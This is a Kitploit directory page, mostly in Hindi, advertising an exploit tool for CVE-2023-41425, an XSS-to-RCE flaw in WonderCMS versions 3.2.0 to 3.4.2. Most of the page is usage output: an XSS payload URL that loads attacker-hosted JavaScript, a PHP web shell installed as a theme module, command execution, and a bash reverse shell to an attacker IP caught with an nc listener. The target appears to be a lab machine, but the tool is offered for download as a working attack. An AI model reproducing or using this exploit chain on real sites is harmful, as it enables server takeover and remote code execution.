Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-41425 — WonderCMS v3.2.0 - v3.4.2 XSS से RCE एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/xpltive/cve-2023-41425
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubxpltive/cve-2023-41425

CVE-2023-41425

WonderCMS v3.2.0 - v3.4.2 XSS से RCE एक्सप्लॉइट

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-41425

CVE-2023-41425 Wonder CMS में एक reflexted XSS कमजोरी है, जो installModule कंपोनेंट के माध्यम से एक दुर्भावनापूर्ण स्क्रिप्ट के जरिए मनमाना कोड निष्पादित करने की अनुमति देती है।

उपयोग

लक्ष्य के loginURL के विरुद्ध एक्सप्लॉइट चलाना, हमारे IP और पोर्ट को निर्दिष्ट करना जहां वेब सर्वर दुर्भावनापूर्ण .js फ़ाइल होस्ट कर रहा है:

root@kitploit:~
$ python3 exploit.py --url http://sea.htb/loginURL --xip 10.10.16.25 --xport 8888
[+] Creating PHP Web Shell
[+] Writing malicious.js
[+] XSS Payload:
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.16.25:8888/malicious.js"></script><form+action="
[+] Web Shell can be accessed once .zip file has been requested:
http://sea.htb/themes/malicious/malicious.php?cmd=<COMMAND>
[+] To get a reverse shell connection run the following:
[+] curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'" 
[+] Starting HTTP server
Serving HTTP on 10.10.16.25 port 8888 (http://10.10.16.25:8888/) ...
<--REDACTED-->  "GET /malicious.js HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -

XSS पेलोड पीड़ित को भेजें। एक बार जब पीड़ित लिंक खोलता है, तो .js उनके द्वारा ऊपर शुरू किए गए वेब सर्वर से अनुरोध किया जाएगा। फिर .js एक साधारण PHP वेब शेल वाले दुर्भावनापूर्ण .zip मॉड्यूल को डाउनलोड करेगा।

एक बार .zip का अनुरोध हो जाने के बाद, इसे installModule के माध्यम से स्थापित किया जाना चाहिए और स्क्रिप्ट द्वारा प्रदान किए गए लिंक के माध्यम से एक्सेस किया जा सकता है।

कमांड चलाना

root@kitploit:~
$ curl -s 'http://sea.htb/themes/malicious/malicious.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

रिवर्स शेल

पहले लिसनर सेट करें, फिर रिवर्स शेल कनेक्शन स्थापित करने के लिए कोई भी कमांड चलाएं। स्क्रिप्ट ऐसा करने का एक उदाहरण प्रदान करती है (Linux)।

root@kitploit:~
$ curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"

और लिसनर पर कनेक्शन प्राप्त करें:

root@kitploit:~
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.194.205] 54398
bash: cannot set terminal process group (1135): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sea:/var/www/sea/themes/malicious$

स्थापना

आवश्यकताओं को स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

सहायता:

root@kitploit:~
$ python3 exploit.py --help

usage: exploit.py [-h] --url URL --xip XIP --xport XPORT

Exploit Wonder CMS v3.2.0 - v3.4.2 XSS to RCE (CVE-2023-41425)
Initial CVE and proof-of-concept by prodigiousMind
Rewritten by xpltive

options:
  -h, --help     show this help message and exit
  --url URL      Target URL of loginURL (Example: http://sea.htb/loginURL)
  --xip XIP      IP for HTTP web server that hosts the malicious .js file
  --xport XPORT  Port for HTTP web server that hosts the malicious .js file

श्रेय

कमजोरी की खोज और रिपोर्ट करने का श्रेय prodigiousMind को जाता है (लिंक)।

टूल डाउनलोड करें